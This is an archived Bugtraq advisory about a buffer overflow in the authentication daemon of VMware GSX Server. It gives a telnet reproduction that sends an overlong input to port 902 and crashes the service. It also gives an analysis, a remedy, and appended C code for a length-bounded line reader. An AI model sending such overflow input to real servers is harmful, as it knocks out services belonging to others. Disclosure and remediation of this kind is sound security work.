List: bugtraq
Subject: VMWare GSX Server Authentication Server Buffer Overflow
From: Darryl Swofford <dswofford () kpmg ! com>
Date: 2003-10-31 16:28:55
Author: Darryl Swofford
Email: dswofford@kpmg.com
Date: 2003/10/31
System:
VMware GSX Server 2.0.1 build-2129 for Windows (other versions not tested). Tested on Windows NT/2000/2003/XP systems.
Description:
After reviewing BugTraq #5294 (VMWare GSX Server Authentication Server Buffer Overflow Vulnerability) I was able to modify the sample code to exploit the updated vmware-authd service.
I will not release the source code as I feel this is not prudent until the vendor acknowledges the issue. Until then you can view the overflow by using telnet with the following syntax and simply alter the code as I did.
> telnet VMserver.somecompany.com 902
> 220 VMware Authentication Daemon Version 1.00
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA599 \
vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()
>
Connection to host lost.
Analysis:
It seems that the vmware-authd service limits the input strings of the program when passed correct arguments (USER, PASS, GLOBAL); however, the initial readline can be overflowed as it does not control the amount of data passed to it.
Remedy:
Stop and disable the VMware authorization service.
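
The Analysis above describes an initial line read that places no limit on incoming data before the USER/PASS/GLOBAL handling runs. The following C code is an added example, not part of the original post and not VMware's code, showing a line reader that enforces a maximum length before any command parsing; `feed_chunk`, `struct line_reader` and the 128-byte limit are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

#define LINE_MAX_LEN 128   /* assumed protocol limit; not taken from VMware */

enum line_status { LINE_OK = 0, LINE_INCOMPLETE = -1, LINE_TOO_LONG = -2 };

/* Hypothetical per-connection state: a fixed buffer plus its fill level. */
struct line_reader {
    char   buf[LINE_MAX_LEN + 1];
    size_t used;
};

/*
 * Feed one received chunk into the reader. The fill level is checked before
 * every store, so the fixed buffer cannot be overrun no matter how much data
 * the peer sends before the first newline. On LINE_OK, `line` holds the
 * NUL-terminated line without CR/LF. On LINE_TOO_LONG the caller should
 * report an error and close the connection without parsing anything.
 * Bytes after the newline in the same chunk are discarded (a lock-step
 * command/response protocol is assumed).
 */
enum line_status feed_chunk(struct line_reader *r, const char *chunk,
                            size_t len, char *line, size_t line_cap)
{
    for (size_t i = 0; i < len; i++) {
        char c = chunk[i];
        if (c == '\n') {
            size_t n = r->used;
            if (n > 0 && r->buf[n - 1] == '\r')
                n--;                      /* strip the CR of a CRLF pair */
            if (n + 1 > line_cap)
                return LINE_TOO_LONG;     /* caller's buffer is too small */
            memcpy(line, r->buf, n);
            line[n] = '\0';
            r->used = 0;                  /* ready for the next line */
            return LINE_OK;
        }
        if (r->used >= LINE_MAX_LEN) {    /* limit reached with no newline */
            r->used = 0;
            return LINE_TOO_LONG;
        }
        r->buf[r->used++] = c;
    }
    return LINE_INCOMPLETE;               /* wait for more data */
}
```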